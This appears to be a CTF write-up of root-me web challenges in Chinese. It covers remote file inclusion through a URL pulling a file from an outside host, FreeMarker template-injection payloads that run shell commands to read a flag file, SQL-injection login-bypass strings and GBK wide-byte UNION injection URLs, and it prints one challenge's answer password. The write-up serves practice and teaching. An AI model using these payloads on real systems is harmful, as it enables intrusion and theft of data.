Remote File Inclusion-遠程文件包含
Get the PHP source code.
ctrl+u
進行RFI攻擊需要同時具備三個條件(被攻擊機器):
allow_url_fopen = On (默認開啟)
allow_url_include = On (默認關閉)
被包含的變量前沒有目錄的限制
view-source:http://challenge01.root-me.org/web-serveur/ch13/?lang=http://7xspti.com2.z0.glb.clouddn.com/123
Server-side Template Injection-服務器端模板注入
Java EE
Exploit the vulnerability in order to retrieve the validation password in the file SECRET_FLAG.txt.
對輸入過濾不嚴格
${2*3}
說明執行了
<#assign ex="freemarker.template.utility.Execute"?new()>
${ ex("ls -l") }
找目錄SECRET_FLAG.txt
查看選中部分源碼
<#assign ex="freemarker.template.utility.Execute"?new()>
${ ex("cat ../SECRET_FLAG.txt") }
SQL injection - authentication
Retrieve the administrator password
ctrl+u
使用萬能密鑰
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
密碼123456
ctrl+u
type="password" value="t0_W34k!$"
SQL injection - authentication - GBK
寬字節注入
http://challenge01.root-me.org/web-serveur/ch42/index.php?id=1�\'
http://leettime.net/sqlninja.com/tasks/mics_ch6.php?id=1�\'
http://leettime.net/sqlninja.com/tasks/mics_ch6.php?id=1�\'Union(select(1),2,3,4,5,6,7,8)%23
http://leettime.net/sqlninja.com/tasks/mics_ch6.php?id=1�\'Union(select(1),version(),3,4,5,6,7,8)%23
SQL injection - string-字符型注入
Retrieve the administrator password
http://challenge01.root-me.org/web-serveur/ch19/?action=news&news_id=1
正常
http://challenge01.root-me.org/web-serveur/ch19/?action=news&news_id=1'
報錯
𖠂’ OR 1=1 /*
SELECT * FROM test WHERE name = '𖠂’ OR 1=1 /*’ LIMIT 1
歡迎訪問我的獨立博客:joy_nick